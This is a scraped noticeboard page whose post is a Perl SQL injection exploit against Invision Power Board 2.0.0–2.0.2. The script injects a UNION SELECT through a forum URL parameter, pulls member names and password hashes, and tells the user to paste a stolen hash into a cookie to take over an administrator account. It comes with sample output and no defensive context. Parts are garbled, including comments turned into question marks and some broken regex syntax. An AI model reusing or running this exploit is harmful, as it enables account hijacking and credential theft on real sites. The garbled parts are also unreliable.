™ , tema en el tablón de anuncios de

Anuncios universidad

Tablones de anuncios por facultades en patatabrava.com

Publicado por el Thursday, 1 de January de 1970

#!/usr/bin/perl
use IO::Socket;

## Invision Power Board v2.0.0 - 2.0.2 sql injection exploit
## by RusH security team (www.rst.void.ru)
## coded by 1dt.w0lf
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## example:
##
## r57ipb.pl 127.0.0.1 /IPB202/ 2 1 3edb1eaeea640d297ee3b1f78b5679b3
## ------------------------------------------------------------------------------------------------
## [>] SERVER: 127.0.0.1
## [>] DIR: /IPB202/
## [>] FORUM: 2
## [>] TOPIC: 1
## [>] SID: 3edb1eaeea640d297ee3b1f78b5679b3
## [>] PREFIX:
## [>] ID:
## ------------------------------------------------------------------------------------------------
##
## [~] PREPARE TO CONNECT...
## [+] CONNECTED
## [~] SENDING QUERY...
## [+] DONE!
##
## PREFIX: ibf_
##
## r57ipb.pl 127.0.0.1 /IPB202/ 2 1 3edb1eaeea640d297ee3b1f78b5679b3 ibf_
## ------------------------------------------------------------------------------------------------
## [>] SERVER: 127.0.0.1
## [>] DIR: /IPB202/
## [>] FORUM: 2
## [>] TOPIC: 1
## [>] SID: 3edb1eaeea640d297ee3b1f78b5679b3
## [>] PREFIX: ibf_
## [>] ID:
## ------------------------------------------------------------------------------------------------
##
## [~] PREPARE TO CONNECT...
## [+] CONNECTED
## [~] SENDING QUERY...
## [+] DONE!
##
## --[ REPORT ]------------------------------------------------------------------------------------
## MEMBER_ID: [1] NAME: [admin] PASS_HASH: [73dea61281aa9b08ed31b4ae2bb9954e]
## ------------------------------------------------------------------------------------------------
## Now you need edit cookie and insert new pass_hash and member_id values.
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## ???? ???? ? ???????????? ?????????? ??????????:
## ???????? pass_hash ??? ?? ????????????? ?????? ?????!!! ? ??????????? ????????
## ?? ?????? ? ??????? ???????? ????? ????? ?? ????? ??? ????? ?????? ???
## ????? ??????. member_id ??? ????? ??????????? ???????? ?? ??????. ??????? ??
## ????? ???????? ???????????? pass_hash =) ?????? ????????????????? ?? ?????? ?
## ???????? pass_hash ? member_id ? ????? cookie ?? ???? ?? ????????
## ??????? ?????? ??????.
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


if (@ARGV < 5)
{
print \"-------------------------------------------------------------------------\\r\\n\";
print \" Invision Power Board v2.0.0 - 2.0.2 sql injection exploit\\r\\n\";
print \"-------------------------------------------------------------------------\\r\\n\";
print \"usage:\\r\\n\";
print \"r57ipb.pl SERVER /DIR/ FORUM_NUM TOPIC_NUM SID [TABLE_PREFIX] [USER_ID]\\r\\n\\r\\n\";
print \"SERVER - server where IPB installed\\r\\n\";
print \"/DIR/ - IPB directory or / for no directory\\r\\n\";
print \"FORUM_NUM - number of existing forum\\r\\n\";
print \"TOPIC_NUM - number of existing topic\\r\\n\";
print \"SID - your session id\\r\\n\";
print \"[TABLE_PREFIX] - table prefix in database\\r\\n\";
print \"[USER_ID] - user id for exploiting\\r\\n\\r\\n\";
print \"e.g. r57ipb.pl 127.0.0.1 /IPB/ 2 1 4496b6d35c1bc0662d721c207f81784e ibf_\\r\\n\";
print \"-------------------------------------------------------------------------\\r\\n\";
exit();
}

if (@ARGV < 6) { $get_table = 1; }

$server = $ARGV[0];
$dir = $ARGV[1];
$fnum = $ARGV[2];
$tnum = $ARGV[3];
$sid = $ARGV[4];
$prefix = $ARGV[5];
$id = $ARGV[6];

print \"-----------------------------------------------------------------------------------------------\\r\\n\";
print \"[>] SERVER: $server\\r\\n\";
print \"[>] DIR: $dir\\r\\n\";
print \"[>] FORUM: $fnum\\r\\n\";
print \"[>] TOPIC: $tnum\\r\\n\";
print \"[>] SID: $sid\\r\\n\";
print \"[>] PREFIX: $prefix\\r\\n\";
print \"[>] ID: $id\\r\\n\";
print \"-------------------------------------------------------------------------------------------\\r\\n\\r\\n\";

$server =~ s/(http:\\/\\/)//eg;

$path = $dir;
$path .= \"index.php?s=\";
$path .= $sid;
$path .= \"&act=Post&CODE=02&f=\";
$path .= $fnum;
$path .= \"&t=\";
$path .= $tnum;
if ($get_table == 1)
{
$path .= \"&qpid=r57\"
}
else
{
$path .= \"&qpid=666666666)%20union%20select%201,1,1,1,1,1,1,1,1,1,CONCAT(id,char(5,
name,char(5,
member_login_key),1,1,1,1,1,1,1,1,1%20from%20\";
$path .= $prefix;
$path .= \"members\";
$path .= ($id)?(\"%20WHERE%20id=$id%20\")\"%20\");
$path .= \"/*\";
}
print \"[~] PREPARE TO CONNECT...\\r\\n\";

$socket = IO::Socket::INET->new( Proto => \"tcp\", PeerAddr => \"$server\",
PeerPort => \"80\") || die \"[-]
CONNECTION FAILED\";

print \"[+] CONNECTED\\r\\n\";
print \"[~] SENDING QUERY...\\r\\n\";
print $socket \"GET $path HTTP/1.1\\r\\n\";
print $socket \"Host: $server\\r\\n\";
print $socket \"Accept: */*\\r\\n\";
print $socket \"Connection: close\\r\\n\\r\\n\";
print \"[+] DONE!\\r\\n\\r\\n\";

$suc =0;

if ($get_table == 1)
{
while ($answer = <$socket>)
{
if ($answer =~ /(mySQL query error: )(.*)( FROM )(.*)(posts)/){ print \"PREFIX: $4\\r\\n\";
$suc = 1; }
}
if (!$suc) { print \"Exploit failed\\r\\n\"; }
exit();
}

print \"--[ REPORT ]---------------------------------------------------------------------------------\\r\\n\";
while ($answer = <$socket>)
{
if ($answer =~ /^([^:]*)[^:]*)[a-z,0-9]{32})$/) { print \"MEMBER_ID: [$1] NAME: [$2]
PASS_HASH: [$3]\\r\\n\"; $suc = 1; }
}
print \"------------------------------------------------------------------------------------------------\\r\\n\";
if ($suc == 1) { print \"Now you need edit cookie and insert new pass_hash and
member_id values.\\r\\n\";
exit(); }
else { print \"Exploit failed\\r\\n\"; }

Responder a

Otros anuncios de